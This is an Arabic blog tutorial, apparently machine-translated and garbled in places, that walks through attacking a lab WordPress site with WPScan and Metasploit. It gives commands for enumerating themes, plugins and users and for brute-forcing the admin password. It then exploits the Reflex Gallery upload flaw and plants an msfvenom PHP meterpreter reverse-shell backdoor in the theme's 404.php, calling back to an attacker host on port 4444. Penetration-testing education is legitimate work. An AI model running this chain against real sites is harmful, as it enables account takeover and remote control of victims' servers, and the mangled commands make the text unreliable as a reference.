اختبار الاختراق وورد باستخدام WPScan و Metasploit

في مقالنا السابق ناقشنا "الإعداد لاختبار مخترع WordPress في أوبونتو" واليوم سوف تتعلم اختبار الاختراق وورد باستخدام WPScan و Metasploit
المهاجم: كالي لينكس
الهدف: وورد 
WPScan هو عبارة عن ماسح ضوئي للثغرات في الصندوق الأسود لبرنامج WordPress المكتوب بلغة PHP ويركز بشكل أساسي على أنواع مختلفة من الثغرات الأمنية في WordPress و WordPress themes و plugins. حسنًا ، يتم تثبيت أداة WPScan افتراضيًا في Kali Linux و SamuraiWTF و Pentoo و BlackArch و BackBox Linux. WPScanuses قاعدة البيانات لجميع الإضافات والمواضيع المتاحة (ما يقرب من 18000 الإضافات و 2600 الموضوعات) أثناء اختبار ضد الهدف للعثور على الإصدارات القديمة ونقاط الضعف.
الأشياء التي يمكن أن تقوم بها WPScan بالنسبة لك هي:
اكتشاف إصدار من WordPress المثبتة حاليًا.
-يمكن الكشف عن الملفات الحساسة مثل readme ، robots.txt ، قاعدة البيانات استبدال الملفات ، إلخ.
-التحقق من الميزات الممكّنة على WordPress المثبتة حاليًا.
-إصدار إصدار سمة واسم.
-تحقق من المكونات الإضافية المثبتة ويمكن أن تخبرك ما إذا كانت قديمة أم لا.
-إعداد أسماء المستخدمين أيضا.
لنبدأ.
انتقل إلى محطة كالي لينكس واكتب ما يلي لتنزيل wpscan من git hub.
مؤتمر نزع السلاح المكتبي
بوابة استنساخ https://github.com/wpscanteam/wpscan.git
الآن ببساطة اكتب في المحطة الطرفية لتشغيل البرنامج النصي:
./wpscan.rb –h
باستخدام الخيار الافتراضي سنقوم باختراق موقعنا على wordpress:

مسح نسخة وورد من الهدف الموقع

Wpscan هو أداة رائعة لمسح مواقع الويب وورد. سنحاول الآن إجراء بعض عمليات المسح الأساسية ، وسنستخدم أدوات تعداد للعثور على معلومات حول المظاهر والمكونات الإضافية وأسماء المستخدمين وما إلى ذلك.
الآن اكتب الأمر التالي لمسح ووردبرس] وخادمها:
./wpscan.rb –u http://192.168.0.101/wordpress/
بدلاً من http://192.168.0.101/wordpress/ اكتب اسم موقع الويب الذي تريد مسحه ضوئيًا. 
هنا وجدت الخادم: Apache / 2.4.7 ، PHP /5.5.9 وورد الإصدار 4.8.1 ، باستخدام هذه المعلومات يمكن للمهاجم التحقق من استغلاله في Google. وعلاوة على ذلك ، وجد أيضًا أن دليل التحميل يحتوي على قائمة أدلة تمكّن مما يعني أن أي شخص يمكنه تصفح الدليل / wp-content / uploads لعرض الملفات والمحتويات التي تم تحميلها.

تعداد وورد الموضوع

و موضوع يسيطر على نظرة عامة ويشعر من الموقع بما في ذلك أشياء مثل تخطيط الصفحة، مواقع القطعة، والخط الافتراضي وخيارات الألوان. يحتوي WordPress.com على مجموعة واسعة من المواضيع لمستخدميه وكل موضوع له صفحة حول يتضمن ميزات وإرشادات.
لفحص المظهر المثبت لنوع موقع Wordpress ، اتبع الأمر التالي:
./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate t

تعداد وورد المواضيع الضعيفة

لفحص الموضوع الضعيف الذي تم تثبيته من نوع موقع Wordpress ، اتبع الأمر التالي:
./wpscan.rb –u http://192.168.0.101/wordpress/–enterate vt
من نتيجة الفحص لم نعثر على أي موضوع ضعيف مما يعني أنه لا يوجد موضوع ضعيف يمكن استغلاله.

تعداد wordpress الإضافات

تعتبر المكونات الإضافية جزءًا صغيرًا من التعليمات البرمجية للبرنامج الذي يمكن إضافته إلى موقع WordPress لتوسيع وظائفه.
للعثور على المكونات الإضافية المثبتة على موقع WordPress هدفنا ، اكتب في المحطة:
./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate p
أخيرًا ، بعد بضع ثوانٍ ، ستحصل على نتيجة تثبيت مكون إضافي. يمكنك أن ترى أن في بلدي مسح النتيجة v3.3.3 askismet ، pixabay-images v2.14 ، wptouch v3.4.3 يتم الكشف عن مثل هذه الأنواع من المكونات في تثبيت. بالإضافة إلى أنه يصف أيضًا آخر تحديث وأحدث إصدار من هذا المكون الإضافي.

تعداد ووردبرس]

الآن اكتب الأمر التالي لمسح المكونات الضعيفة في أي موقع wordpress:
./wpscan.rb –u http://192.168.0.101/wordpress/– عدد vp
بعد بضع ثوانٍ ، ستحصل على نتيجة لتثبيت مكون إضافي ضعيف في موقع الويب. من الصورة المعينة يمكنك ملاحظة أن اللون الأحمر يشير إلى المكونات الإضافية الضعيفة بالإضافة إلى رابط مآثر CVE.

استغلال المكونات الضعيفة باستخدام Metasploit

هذه الوحدة تستغل تحميل كود PHP بشكل اعتباطي في الإصدار 3.1.3 من رد Reflex Gallery. تسمح الثغرة الأمنية بالتحميل التعسفي للملفات وتنفيذ التعليمات البرمجية عن بُعد.
افتح إطار metasploit لتحميل المحطة الطرفية وقم بتنفيذ الأمر التالي:
استخدام استغلال / يونيكس / webapp / wp_reflexgallery_file_upload
msf exploit ( wp_reflexgallery_file_upload )> set rhost 192.168.0.101
msf exploit ( wp_reflexgallery_file_upload )> set targetURI / wordpress /
msf exploit ( wp_reflexgallery_file_upload )> exploit
رائع!! من صورة معينة يمكنك مراقبة جلسة المترجم لخادم الويب الضحية.
متر متر> sysinfo

تعداد ووردبرس أسماء المستخدمين

من أجل تعداد أسماء المستخدم من تنفيذ Wordpress الموقع التالي الأمر:
./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate u
بعد وقت ما ، سيتم تفريغ جدول أسماء المستخدمين. في هذا الفحص ، عثرت على ثلاثة مستخدمين باستخدام معرّفهم كما هو موضح أدناه:
المعرف 1: admin
ID2: اشعال
الرقم التعريفي: التجريبي

تعداد ALL بأمر واحد

كل ما قمنا بفحصه أعلاه يمكن تعداده بسهولة مرة واحدة عن طريق تنفيذ الأمر أدناه:
./wpscan.rb -u http://192.168.0.101/ wordpress -e at -e ap -eu
هنا استخدمنا خيار -e في –e ap –eu للأسباب التالية:
- في: تعداد جميع المواضيع من الموقع المستهدف
–e ap: تعداد كل المكونات الإضافية للموقع المستهدف
–eu: تعداد جميع أسماء المستخدمين للموقع المستهدف

هجوم القوة الغاشمة باستخدام Wpscan

بمساعدة اسم المستخدم الذي قمنا بترقيمه أعلاه ، يمكننا إنشاء قائمة كلمات المرور لمشرف المستخدم ويمكنه تجربة هجوم تسجيل الدخول باستخدام القوة الغاشمة باستخدام أمر موضح أدناه.
./wpscan.rb –u http://192.168.0.101/ wordpress –wordlist /root/Desktop/dict.txt –username admin
سيبدأ في مطابقة التوليفة الصحيحة لاسم المستخدم وكلمة المرور لتسجيل الدخول ثم تفريغ النتيجة ، من صورة معينة يمكنك أن ترى أنها عثرت على بيانات اعتماد تسجيل الدخول للموقع المستهدف كمشرف: كلمة المرور.

توليد PHP مستتر في وورد

يمكنك استخدام بيانات الاعتماد أعلاه لتسجيل الدخول إلى لوحة المشرف حيث يمكننا تحميل أي موضوع ، مع الاستفادة من حق الإدارة سنحاول تحميل البرنامج النصي الخبيث لتحقيق اتصال عكسي من نظام الضحية.
بمجرد أن تكون داخل لوحة الإدارة ، انقر على المظهر من لوحة المعلومات ثم حدد محرر الخيارات .
الآن حدد قالب 404.php المعطى على الجانب الأيمن من الإطار ؛ بعد ذلك سوف تجد بعض كود php في الإطار المتوسط ​​ل 404 معتدل. محوو php مدونة بأكمله بحيث يمكنك إضافة رمز PHP الخبيثة لتوليد مستتر داخل الموقع كموضوع جديد.
الآن استخدم  msfvenom  لتوليد البرنامج النصي PHP الخبيث واكتب الأمر التالي.
msfvenom -p php / meterpreter / reverse_tcp lhost = 192.168.0.107 lport = 4444 -f raw
من لقطة الشاشة ، يمكنك قراءة السيناريو PHP الذي تم إنشاؤه ، في هذه اللحظة ، نحتاج إلى نسخ النص من  * <؟ php ……… .die ()؛  كذلك سنقوم في الماضي داخل قالب وورد كموضوع جديد.
الآن   فوق الماضي نسخ PHP النص  * <؟ فب .......... دي () ؛   هنا كموضوع جديد ضمن  قالب 404.php المحدد   .
من ناحية أخرى تحميل إطار metasploit وبدء  multi / handler
استخدام استغلال / متعددة / معالج
 msf exploit (handler)> set payload php / meterpreter / reverse_tcp
msf exploit (handler)> set lhost 192.168.0.107
msf exploit (handler)> 4444
msf exploit (handler)> exploit
عندما تقوم بتنفيذ الموضوع الذي تم تحميله 404.php في المتصفح ، فسوف تتلقى اتصال عكسي في multi / handler واحصل على  جلسة مترية  لنظام الضحية.
http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php
هنا شكل قطة شاشة يمكنك أن ترى من خلال متر متر لدينا الوصول إلى قذيفة الضحية.
متر متر> sysinfo
وبهذه الطريقة يمكن استخدام WPSCAN ومسؤول METASPLOIT التحقق من قوة وضعف وورد الموقع.

المؤلف:  AkshayBhardwaj هو هاكر عاطفي ، حماسة أمن المعلومات وباحث | فنان رسم | كاتب تقني.

Commentaires

Posts les plus consultés de ce blog